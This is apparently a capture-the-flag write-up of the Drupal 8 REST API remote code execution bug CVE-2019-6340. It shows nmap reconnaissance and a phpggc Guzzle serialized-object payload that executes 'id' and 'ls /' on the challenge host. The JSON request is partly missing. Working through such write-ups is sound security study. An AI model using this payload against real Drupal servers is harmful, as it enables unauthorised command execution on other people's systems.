Not so Blin D Rush CVE-2019-6340


In short the Remote Code Execution happens due to insecure deserialization done by the REST API

Insecure Deserialization

In order to understand Insecure deserialization first understand what is serialization-deserialization.

Source :

Challenge Solution

By visiting the challenge URL we see a post made by user optimusprime . However a quick look at the favicon suggests it is running on Drupal.

Blog Post by Optimus Prime
nmap -p 80 -T4 -A hostStarting Nmap 7.80 ( ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
"link": [
"value": "link",
"_links": {
"type": {
"href": ""
phpggc guzzle/rce1 system id --jsonO:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}
The function unserialize() gets triggered code is executed
s:4:\”ls /\”
Contents of / directory



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store